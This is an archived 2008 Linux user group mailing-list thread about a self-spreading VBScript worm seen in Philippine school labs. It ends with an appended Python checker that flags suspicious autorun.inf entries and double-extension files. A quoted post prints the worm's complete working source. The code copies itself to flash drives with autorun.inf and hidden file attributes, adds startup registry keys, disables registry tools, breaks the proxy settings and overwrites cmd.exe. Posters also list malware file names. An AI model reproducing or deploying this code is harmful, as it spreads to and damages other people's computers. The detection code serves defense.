The "scandal variant" of this script also generates [PEGASUS].TXT on some
systems which contains "BLACK PEGASUS" Hacking Team from Agusan del Sur. And
also mentions that he/she/they come from STI in Agusan.
That just confirms how prevalent this script is and is being exchanged in
the underground too frequently.
On Feb 12, 2008 10:47 PM, Camilo III Lozano <[EMAIL PROTECTED]> wrote:
> from what I know.. the one who made TTMS is from Quezon, Manila...
>
> which is arch is right.. the original is...
>
> rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE YOU"
>
> hmmm... there's also a Funny UST scandal thingy of this... there are a lot... this is what's
> trending now... scripts that just pester the computer, that creep into the computer
> without being detected by anti-virus... mostly VB....
>
> the list of these that I have encountered in the XU internet lab is...
>
> autorun.*
> TTM*.*
> Desktop.*
> imgkulot*.*
> RECYCLER\INFO.exe
> RECYCLER\RECYCLER.exe
> RECYCLER\Desktop.ini
> sysdll.exe
> krag.exe
>
> RavMon*.*
> msv*.dll
> scvhosts.exe
> scvhost.exe
> svhost.exe
> C:\Windows\svhost.exe
> C:\Windows\svhost32.exe
> "New Folder".exe
> "Funny UST Scandal.avi.exe"
> smss.exe
> jay.exe
> transmit.exe
> isetup.exe
>
>
> most of them spread through flash disks... as hidden files, system files and
> read-only files....
>
> then from time to time.. their names change.. then the way they creep in improves...
> my last worst encounter was that even if you went into safe mode, it was still
> running... as if it was already part of the system... even if you deleted it in regedit
> it was still there... msconfig, still there. the last thing I did was delete
> the RECYCLER folders on all my drives.. because it turns out that's where they were hiding..
> hehehehehe... so it was solved right away.. :)
>
> amen...
>
> ===================================
>
> On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote:
>
> > Obviously this is offtopic, since the guy's script can only
> > run in an OS which supports regedit.exe, wscript.exe and the
> > other MS-apps.
> >
> > Still, what he made is pretty neat... it traverses all flashdrives
> > and then copies itself to them :D
> >
> > pretty harmless compared to the other naughty scripts but nonetheless
> > still annoying :D
> >
> >
> > "DOHHGS Ni TAGA CDOC"
> >
> > Who wants to claim ownership for this script?
> > :D
> >
> > any takers?
> >
> >
> > ---------------------------------------------------------------------------------------
> > 'THIS IS A MODIFIED VERSION BY: TTMS
> > 'PROUD TO BE FILIPINO, NOT TO CORRUPTION!
> >
> > On Error Resume Next
> >
> > Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath,
> > flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd
> >
> > mycmdfile = "cmd.exe"
> >
> > mydate = month(now()) & day(now())
> > myvbsalias = "TTMS" & mydate
> > myvbsfile = myvbsalias & ".dll.vbs"
> >
> > atr = "[autorun]" & vbCrLf & _
> > "shellexecute=wscript.exe " & myvbsfile
> >
> > Set fs = CreateObject("Scripting.FileSystemObject")
> >
> > Dim mf, text, size
> >
> > Set mf = fs.GetFile(WScript.ScriptFullname)
> >
> > size = mf.size
> > check = mf.Drive.drivetype
> >
> > Set text = mf.openastextstream(1, -2)
> >
> > Do While Not text.atendofstream
> > mysource = mysource & text.readline
> > mysource = mysource & vbCrLf
> > Loop
> >
> > Do
> > Set winpath = fs.GetSpecialFolder(0)
> >
> > Set tf = fs.GetFile(winpath & "\" & myvbsfile)
> >
> > tf.Attributes = 32
> >
> > Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)
> >
> > tf.Write mysource
> > tf.Close
> >
> > Set tf = fs.GetFile(winpath & "\" & myvbsfile)
> >
> > tf.Attributes = 39
> >
> > If (mydate = "318") Then
> > Set winsyspath = fs.GetSpecialFolder(1)
> >
> > cmd = "@echo off" & vbCrLf & _
> > "wscript " & winpath & "\" & myvbsfile
> >
> > Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)
> >
> > tf.Attributes = 32
> >
> > Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)
> >
> > tf.Write cmd
> > tf.Close
> >
> > rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> > Settings\ProxyEnable", 1, "REG_DWORD"
> > rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> > Settings\ProxyServer", "0.0.0.0:80"
> >
> > rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control
> > Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD"
> > End If
> >
> > For Each flashdrive In fs.drives
> > If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
> > flashdrive.Path <> "A:" Then
> > Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
> >
> > tf.Attributes = 32
> >
> > Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile,
> > 2, True)
> >
> > tf.Write mysource
> > tf.Close
> >
> > Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
> >
> > tf.Attributes = 39
> >
> > Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
> >
> > tf.Attributes = 32
> >
> > Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2,
> > True)
> >
> > tf.Write atr
> > tf.Close
> >
> > Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
> >
> > tf.Attributes = 39
> > End If
> > Next
> >
> > Set rg = CreateObject("WScript.Shell")
> >
> > rg.RegWrite
> >
> > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
> > 1, "REG_DWORD"
> >
> > rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> > Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA IMO
> > PC"
> >
> > rg.RegWrite
> >
> > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\MSConfig",
> > winpath & "\" & myvbsfile
> > rg.RegWrite
> >
> > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig",
> > winpath & "\" & myvbsfile
> >
> >
> > If check <> 1 Then
> > WScript.sleep 200000
> > End If
> >
> > Loop While (check <> 1)
> >
> > Set sd = CreateObject("WScript.Shell")
> >
> > sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
> >
> > _________________________________________________
> > Kagay-Anon Linux Users' Group (KLUG) Mailing List
> > [email protected] (http://cdo.linux.org.ph)
> > Searchable Archives: http://archives.free.net.ph
> >
>
>
>
> --
> --------------------
> http://www.metacatalyst.com
> http://www.metacatalyst.org
> http://www.zabyer.org
>
> Got my Own Hacker Key:
> v3sw3BHhw5ln2pr5OFPck3ma2u4MLw5XVm+5l5UCi5Ne4t3b5en5g5RaIs5MSr3p2
> http://www.hackerkey.com
>
> Registered Linux User: #439468
--
"A dog that has no bite, barks loudest."
Registered Linux User #400165
http://baudizm.blogsome.com
http://www.bayanihanbooks.com
Full-Disclosure,LARTC,Open-ITLUG, PRUG, KLUG, linuxusersgroup,
sybase.public.ase.linux
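
A defensive companion to the thread above (an added example, not part of the original messages): a Python check that audits a removable drive's `autorun.inf` and file listing for the traits the posts describe, namely an `[autorun]` entry that launches `wscript.exe`, decoy double extensions such as `.dll.vbs` and `.avi.exe`, and executables sitting directly in `RECYCLER`. The rule names, extension sets and sample data are assumptions constructed for illustration.

```python
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".vbe", ".js", ".wsf"}
DECOY_EXTS = {".dll", ".avi", ".jpg", ".doc", ".txt", ".pdf", ".mp3"}  # assumed decoy set

def parse_autorun(text):
    """Return {key: value} from the [autorun] section; keys are lower-cased."""
    entries, in_section = {}, False
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line and not line.startswith(";"):
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def audit_drive(autorun_text, paths):
    """Return (rule, detail) findings for one removable drive."""
    findings = []
    for key, value in parse_autorun(autorun_text).items():
        # Keys that make Windows start a program when the drive is opened.
        if key in ("open", "shellexecute") or key.endswith("\\command"):
            words = value.replace('"', "").split()
            if words and words[0].lower() in SCRIPT_HOSTS:
                findings.append(("autorun-script-host", f"{key}={value}"))
    for p in map(PureWindowsPath, paths):
        ext = [s.lower() for s in p.suffixes]
        # Harmless-looking extension followed by an executable one.
        if len(ext) >= 2 and ext[-1] in EXEC_EXTS and ext[-2] in DECOY_EXTS:
            findings.append(("double-extension", str(p)))
        # Executable placed directly in RECYCLER rather than in a per-user subfolder.
        if len(p.parts) == 2 and p.parts[0].lower() == "recycler" and ext and ext[-1] in EXEC_EXTS:
            findings.append(("executable-in-recycler-root", str(p)))
    return findings

# Constructed sample: autorun.inf text in the shape the quoted script writes,
# plus a file listing drawn from names mentioned in the thread.
SAMPLE_AUTORUN = "[autorun]\r\nshellexecute=wscript.exe TTMS212.dll.vbs\r\n"
SAMPLE_FILES = ["TTMS212.dll.vbs", "autorun.inf", "notes.txt",
                "Funny UST Scandal.avi.exe", "RECYCLER\\INFO.exe", "RECYCLER\\Desktop.ini"]

if __name__ == "__main__":
    for rule, detail in audit_drive(SAMPLE_AUTORUN, SAMPLE_FILES):
        print(f"{rule}: {detail}")
```

Because the files are written with hidden, system and read-only attributes, the listing passed in has to come from an enumeration that includes hidden and system files.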